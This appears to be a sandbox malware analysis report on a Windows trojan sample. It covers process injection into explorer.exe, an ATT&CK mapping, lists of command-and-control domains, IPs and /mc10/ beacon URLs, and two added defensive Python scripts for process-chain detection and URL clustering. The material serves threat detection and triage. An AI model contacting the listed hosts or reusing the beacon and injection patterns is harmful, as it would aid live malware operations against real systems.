Source: Yara match  File source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match  File source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

The report's matrix is reproduced here one tactic per line. A number in front of a technique is the report's annotation on techniques for which the analysis found matching signatures; techniques without a number are the matrix grid and were not matched.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 1 Shared Modules; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 512 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 512 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 1 System Time Discovery; 231 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 214 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 1 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (ID 1470721)

Sample: 8tvMmyxveyzFcnJ.exe, start date 10/07/2024, architecture WINDOWS, score 100
Sample-level network: www.fondsa.xyz (Performs DNS queries to domains with low reputation); www.thecollisionmagazine.com; 12 other IPs or domains
Sample-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures

Process tree as drawn in the graph:

8tvMmyxveyzFcnJ.exe (started)
    dropped: C:\Users\user\...\8tvMmyxveyzFcnJ.exe.log (ASCII)
    signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes; Switches to a custom stack to bypass stack traces
    +-- 8tvMmyxveyzFcnJ.exe (started)
    |       signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
    |       +-- explorer.exe (injected)
    |               network: www.at89v2.com 103.224.212.213:80 (source port 50631), TRELLIAN-AS-AP Trellian Pty Limited, AU, Australia; www.291van.fun 188.114.97.3:80 (source port 49743), CLOUDFLARENET, US, European Union; 3.64.163.50:80 (source port 50630), AMAZON-02, US, United States
    |               signatures: Uses netsh to modify the Windows network and firewall settings
    |               +-- netsh.exe (started)
    |               |       signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
    |               |       +-- cmd.exe (started)
    |               |               +-- conhost.exe (started)
    |               +-- autofmt.exe (started)
    +-- 8tvMmyxveyzFcnJ.exe (started)
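The process chain the graph shows (explorer.exe starting netsh.exe with a bare command line, netsh.exe then starting cmd.exe, and the sibling autofmt.exe also started by explorer.exe) is the part of this report a detection engineer would most want to encode. What follows is an added example, not code from the report or from Joe Sandbox: it runs a parent/child check over a handful of constructed process-creation events whose PIDs are invented and whose shape is modelled on the tree above. The heuristic it uses, explorer.exe launching a binary from C:\Windows\SysWOW64 with no arguments, is an assumption chosen to fit this report and needs tuning against your own baseline before it goes into production.

```python
"""Parent/child process-chain check for the tree this report shows:
explorer.exe -> netsh.exe (bare command line) -> cmd.exe -> conhost.exe,
and explorer.exe -> autofmt.exe. Added example; the events below are
constructed to mirror the report and are not real telemetry.
"""
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon event 1 / Security 4688 style)."""
    pid: int
    ppid: int
    image: str      # full image path as logged
    cmdline: str    # command line as logged


@dataclass(frozen=True)
class Finding:
    pid: int
    image: str
    severity: str   # "medium" or "high"
    reason: str


# Assumption: a parent explorer.exe launching a 32-bit system binary from
# SysWOW64 with no arguments is unusual for a user and matches this report.
SYSWOW64 = "c:\\windows\\syswow64\\"

# Constructed sample events (invented PIDs) modelled on the behaviour graph.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(4212, 1000, r"C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe",
              r'"C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"'),
    ProcEvent(4300, 4212, r"C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe",
              r'"C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"'),
    # explorer.exe (after injection) starts netsh.exe with a bare command line
    ProcEvent(5120, 1000, r"C:\Windows\SysWOW64\netsh.exe",
              r'"C:\Windows\SysWOW64\netsh.exe"'),
    ProcEvent(5180, 1000, r"C:\Windows\SysWOW64\autofmt.exe",
              r'"C:\Windows\SysWOW64\autofmt.exe"'),
    ProcEvent(5300, 5120, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\SysWOW64\cmd.exe"'),
    ProcEvent(5310, 5300, r"C:\Windows\SysWOW64\conhost.exe",
              r"\??\C:\Windows\SysWOW64\conhost.exe"),
    # Benign noise that must not alert: a user-launched editor and an admin
    # running netsh with arguments from a shell.
    ProcEvent(6000, 1000, r"C:\Windows\System32\notepad.exe",
              r'"C:\Windows\System32\notepad.exe"'),
    ProcEvent(6100, 6050, r"C:\Windows\SysWOW64\netsh.exe",
              "netsh advfirewall show allprofiles"),
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_bare_command_line(cmdline: str, image: str) -> bool:
    """True when the command line carries nothing but the image itself."""
    token = cmdline.strip().strip('"').lower()
    return token in (image.lower(), _basename(image))


def find_suspicious_chains(events: List[ProcEvent]) -> List[Finding]:
    """Flag SysWOW64 binaries started by explorer.exe without arguments;
    raise severity when such a binary goes on to start cmd.exe."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[Finding] = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        if parent is None or _basename(parent.image) != "explorer.exe":
            continue
        if not ev.image.lower().startswith(SYSWOW64):
            continue
        if not is_bare_command_line(ev.cmdline, ev.image):
            continue
        spawned_shell = any(
            c.ppid == ev.pid and _basename(c.image) == "cmd.exe" for c in events
        )
        name = _basename(ev.image)
        findings.append(Finding(
            pid=ev.pid,
            image=name,
            severity="high" if spawned_shell else "medium",
            reason=f"explorer.exe -> {name} (no arguments)"
                   + (" -> cmd.exe" if spawned_shell else ""),
        ))
    return findings


if __name__ == "__main__":
    for f in find_suspicious_chains(SAMPLE_EVENTS):
        print(f.severity.upper(), f.pid, f.reason)
```

Run against the constructed events, netsh.exe is reported as high (it started cmd.exe) and autofmt.exe as medium, while notepad.exe (System32, user-launched) and the netsh invocation that carries arguments and has a non-explorer parent are left alone. In a real pipeline the parent lookup would come from the telemetry's parent-process fields rather than a PID map built from the same batch.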

Source | Detection | Scanner | Label
8tvMmyxveyzFcnJ.exe | 53% | ReversingLabs | ByteCode-MSIL.Trojan.Taskun
8tvMmyxveyzFcnJ.exe | 49% | Virustotal |
8tvMmyxveyzFcnJ.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner
www.at89v2.com | 0% | Virustotal
fondsa.xyz | 2% | Virustotal
sainikshiksha.com | 0% | Virustotal
www.291van.fun | 2% | Virustotal
ext-sq.squarespace.com | 0% | Virustotal
www.sainikshiksha.com | 0% | Virustotal
www.tatesfluffyfrenchies.com | 0% | Virustotal
www.thecollisionmagazine.com | 0% | Virustotal
www.motolimod.com | 0% | Virustotal
www.ajansyapai.net | 0% | Virustotal
www.basedawgz.live | 0% | Virustotal
www.huttonsidel.online | 0% | Virustotal
www.llngx.com | 0% | Virustotal
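The domain table above and the URL table that follows it list many of the same hosts, and in the URL table those hosts all carry the same /mc10/ path, two of them with a query string of the form ?M6=...&sZ=Ynzp6xUh, next to unrelated URLs that share nothing. Pulling that structure out of a flat URL list is a routine triage step, so here is an added example, not part of the report: it groups the URL strings by first path segment, reports the paths that recur across several distinct hosts, and lists which query parameters are constant across the beacon URLs under such a path. The input list is copied from this report's URL table, extraction artefacts included (two strings run together such as ".../mc10/www.bjcysadz.xyz", or a host followed by "Referer:"). Whether sZ is a bot or campaign identifier is not stated by the report; the code only shows that its value is identical in both beacon URLs captured here.

```python
"""Group the URLs a sandbox report lists by first path segment, to separate
beacon URLs that share one path across many hosts from unrelated noise.
Added example; the URL list below is copied from this report's URL table.
"""
from collections import defaultdict
from typing import Dict, List, Set
from urllib.parse import parse_qs, urlsplit

# URL strings as they appear in the report, artefacts included.
REPORT_URLS: List[str] = [
    "http://www.at89v2.com/mc10/?M6=+PshiMmsD3s2EuJ9KF3baeU+rJnvgbutDGTUYWD/T/xNi6HtTgrR7YeDwlLM6QRR03T9&sZ=Ynzp6xUh",
    "http://www.motolimod.com/mc10/?M6=vFB2baQv3F/rJ4Poxnbh3E5xW9PPAAbphga1xIFZj8yJGRkxzOANKPapIG+pOmwhUo5D&sZ=Ynzp6xUh",
    "http://www.bjcysadz.xyz/mc10/",
    "http://www.huttonsidel.online/mc10/",
    "http://www.ajansyapai.net/mc10/",
    "http://www.sainikshiksha.com/mc10/",
    "http://www.tatesfluffyfrenchies.com/mc10/",
    "http://www.thecollisionmagazine.com/mc10/",
    "http://www.shophansler.com/mc10/:",
    "http://www.dealerxai.com/mc10/www.bjcysadz.xyz",      # two strings run together
    "http://www.llngx.com/mc10/www.ajansyapai.net",        # two strings run together
    "http://www.ajansyapai.netReferer:",                   # host followed by a header name
    "http://www.fontbureau.com/designers",
    "http://www.fontbureau.com/designers/frere-user.html",
    "https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY",
    "https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win",
    "https://aka.ms/odirmr",
    "https://excel.office.com",
]


def first_segment(path: str) -> str:
    """'/mc10/www.bjcysadz.xyz' -> '/mc10/'; '' or '/' -> '/'."""
    parts = [p for p in path.split("/") if p]
    return f"/{parts[0]}/" if parts else "/"


def cluster_by_path(urls: List[str]) -> Dict[str, List[str]]:
    """Map first path segment -> sorted list of distinct hosts seen with it."""
    clusters: Dict[str, Set[str]] = defaultdict(set)
    for url in urls:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        if host:
            clusters[first_segment(parts.path)].add(host)
    return {path: sorted(hosts) for path, hosts in clusters.items()}


def campaign_paths(clusters: Dict[str, List[str]], min_hosts: int = 3) -> List[str]:
    """Paths that recur across at least min_hosts distinct hosts; '/' is ignored
    because every bare host lands there."""
    return sorted(p for p, hosts in clusters.items()
                  if p != "/" and len(hosts) >= min_hosts)


def constant_params(urls: List[str], path: str) -> Dict[str, str]:
    """Query parameters whose value is the same in every URL under path."""
    values: Dict[str, Set[str]] = defaultdict(set)
    for url in urls:
        parts = urlsplit(url)
        if first_segment(parts.path) != path:
            continue
        for name, vals in parse_qs(parts.query).items():
            values[name].update(vals)
    return {name: next(iter(v)) for name, v in values.items() if len(v) == 1}


if __name__ == "__main__":
    clusters = cluster_by_path(REPORT_URLS)
    for path in campaign_paths(clusters):
        print(path, len(clusters[path]), "hosts:", ", ".join(clusters[path]))
        print("  constant query parameters:", constant_params(REPORT_URLS, path))
```

On the report's own URLs the only recurring path is /mc10/, shared by eleven hosts, and the only constant parameter is sZ. Grouping on the first path segment rather than the full path is what keeps the run-together artefacts and the stray "/mc10/:" entry in the same cluster as the clean beacon URLs; a threshold of three hosts is enough to drop the font-vendor and MSN paths, which each belong to a single host.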
Source | Detection | Scanner | Label
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe
https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe
http://www.fontbureau.com/designers | 0% | URL Reputation | safe
https://excel.office.com | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/frere-user.html | 0% | URL Reputation | safe
https://android.notify.windows.com/iOS | 0% | URL Reputation | safe
http://www.fontbureau.com/designersG | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/? | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.fontbureau.com/designers? | 0% | URL Reputation | safe
https://powerpoint.office.comcember | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://schemas.micro | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
http://www.fonts.com | 0% | URL Reputation | safe
http://www.at89v2.com/mc10/?M6=+PshiMmsD3s2EuJ9KF3baeU+rJnvgbutDGTUYWD/T/xNi6HtTgrR7YeDwlLM6QRR03T9&sZ=Ynzp6xUh | 0% | Avira URL Cloud | safe
http://www.motolimod.com/mc10/?M6=vFB2baQv3F/rJ4Poxnbh3E5xW9PPAAbphga1xIFZj8yJGRkxzOANKPapIG+pOmwhUo5D&sZ=Ynzp6xUh | 0% | Avira URL Cloud | safe
http://www.ajansyapai.netReferer: | 0% | Avira URL Cloud | safe
https://aka.ms/odirmr | 0% | Avira URL Cloud | safe
http://www.huttonsidel.online | 0% | Avira URL Cloud | safe
http://www.huttonsidel.online | 0% | Virustotal |
https://aka.ms/odirmr | 0% | Virustotal |
http://www.bjcysadz.xyz/mc10/ | 0% | Avira URL Cloud | safe
http://www.ajansyapai.net | 0% | Avira URL Cloud | safe
http://www.ajansyapai.net | 0% | Virustotal |
http://www.huttonsidel.online/mc10/ | 1% | Virustotal |
http://www.motolimod.com | 0% | Avira URL Cloud | safe
http://www.zaki-argan.com | 0% | Avira URL Cloud | safe
http://www.huttonsidel.online/mc10/ | 0% | Avira URL Cloud | safe
http://www.bjcysadz.xyz/mc10/ | 1% | Virustotal |
http://www.ajansyapai.net/mc10/ | 0% | Avira URL Cloud | safe
http://www.fondsa.xyzReferer: | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we | 0% | Avira URL Cloud | safe
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | 0% | Avira URL Cloud | safe
http://www.motolimod.com | 0% | Virustotal |
http://www.ajansyapai.net/mc10/ | 1% | Virustotal |
http://www.shophansler.comReferer: | 0% | Avira URL Cloud | safe
http://www.zaki-argan.com | 0% | Virustotal |
http://www.at89v2.com/mc10/www.sainikshiksha.com | 0% | Avira URL Cloud | safe
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | 0% | Virustotal |
http://www.sainikshiksha.com/mc10/ | 0% | Avira URL Cloud | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | 0% | Avira URL Cloud | safe
http://www.kurainu.xyz | 0% | Avira URL Cloud | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark | 0% | Avira URL Cloud | safe
http://www.dealerxai.com/mc10/www.bjcysadz.xyz | 0% | Avira URL Cloud | safe
http://www.motolimod.com/mc10/www.at89v2.com | 0% | Avira URL Cloud | safe
http://www.kurainu.xyz | 0% | Virustotal |
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | 0% | Avira URL Cloud | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark | 0% | Virustotal |
https://wns.windows.com/L | 0% | Avira URL Cloud | safe
http://www.sainikshiksha.com/mc10/ | 1% | Virustotal |
http://www.291van.fun | 0% | Avira URL Cloud | safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | 0% | Virustotal |
http://www.fondsa.xyz | 0% | Avira URL Cloud | safe
http://www.llngx.com/mc10/www.ajansyapai.net | 0% | Avira URL Cloud | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | 0% | Virustotal |
http://www.291van.fun | 2% | Virustotal |
https://word.office.com | 0% | Avira URL Cloud | safe
http://www.sainikshiksha.com/mc10/www.fondsa.xyz | 0% | Avira URL Cloud | safe
http://www.ajansyapai.net/mc10/www.tatesfluffyfrenchies.com | 0% | Avira URL Cloud | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu | 0% | Avira URL Cloud | safe
http://www.zaki-argan.comReferer: | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win | 0% | Avira URL Cloud | safe
http://www.tatesfluffyfrenchies.com/mc10/ | 100% | Avira URL Cloud | phishing
http://schemas.micr | 0% | Avira URL Cloud | safe
http://www.thecollisionmagazine.com/mc10/ | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow- | 0% | Avira URL Cloud | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu | 0% | Avira URL Cloud | safe
http://www.dealerxai.com | 0% | Avira URL Cloud | safe
http://www.shophansler.com/mc10/: | 100% | Avira URL Cloud | phishing
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark | 0% | Avira URL Cloud | safe
http://www.motolimod.com/mc10/ | 0% | Avira URL Cloud | safe
http://www.sainikshiksha.comReferer: | 0% | Avira URL Cloud | safe
https://www.rd.com/list/polite-habits-campers-dislike/ | 0% | Avira URL Cloud | safe
http://www.tatesfluffyfrenchies.com/mc10/www.dealerxai.com | 100% | Avira URL Cloud | phishing
http://www.thecollisionmagazine.comReferer: | 0% | Avira URL Cloud | safe
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img | 0% | Avira URL Cloud | safe
          http://www.basedawgz.liveReferer:0%Avira URL Cloudsafe
          https://outlook.com_0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at0%Avira URL Cloudsafe
          https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%Avira URL Cloudsafe
          http://schemas.mi0%Avira URL Cloudsafe
          http://www.zaki-argan.com/mc10/0%Avira URL Cloudsafe
          http://www.huttonsidel.onlineReferer:0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl0%Avira URL Cloudsafe
          http://www.at89v2.com0%Avira URL Cloudsafe
          http://www.motolimod.comReferer:0%Avira URL Cloudsafe
          http://www.kurainu.xyzReferer:0%Avira URL Cloudsafe
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.at89v2.com | 103.224.212.213 | true | true | | unknown
          fondsa.xyz | 3.33.130.190 | true | true | | unknown
          sainikshiksha.com | 103.191.209.34 | true | true | | unknown
          www.291van.fun | 188.114.97.3 | true | true | | unknown
          ext-sq.squarespace.com | 198.185.159.144 | true | true | | unknown
          www.sainikshiksha.com | unknown | unknown | true | | unknown
          www.llngx.com | unknown | unknown | true | | unknown
          www.tatesfluffyfrenchies.com | unknown | unknown | true | | unknown
          www.fondsa.xyz | unknown | unknown | true | | unknown
          www.basedawgz.live | unknown | unknown | true | | unknown
          www.motolimod.com | unknown | unknown | true | | unknown
          www.huttonsidel.online | unknown | unknown | true | | unknown
          www.thecollisionmagazine.com | unknown | unknown | true | | unknown
          www.ajansyapai.net | unknown | unknown | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            http://www.motolimod.com/mc10/?M6=vFB2baQv3F/rJ4Poxnbh3E5xW9PPAAbphga1xIFZj8yJGRkxzOANKPapIG+pOmwhUo5D&sZ=Ynzp6xUh | true | Avira URL Cloud: safe | unknown
            http://www.at89v2.com/mc10/?M6=+PshiMmsD3s2EuJ9KF3baeU+rJnvgbutDGTUYWD/T/xNi6HtTgrR7YeDwlLM6QRR03T9&sZ=Ynzp6xUh | true | Avira URL Cloud: safe | unknown
            http://www.291van.fun/mc10/?M6=0jqVw3fXhgUe9S01oU54GSyQct+tyOMGPM4Q+l1hxxFHWjnqq7dqR8wNeV12RES6q9dV&sZ=Ynzp6xUh | true | Avira URL Cloud: safe | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            https://aka.ms/odirmr | explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
            http://www.huttonsidel.online | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
            http://www.ajansyapai.netReferer: | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3114554074.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.ajansyapai.net | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
            http://www.bjcysadz.xyz/mc10/ | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
            http://www.huttonsidel.online/mc10/ | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
            http://www.motolimod.com | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
            http://www.zaki-argan.com | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
            http://www.ajansyapai.net/mc10/ | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
            http://www.fondsa.xyzReferer: | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.fontbureau.com/designers | 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://excel.office.com | explorer.exe, 00000004.00000002.4153126684.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1707756779.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we | explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
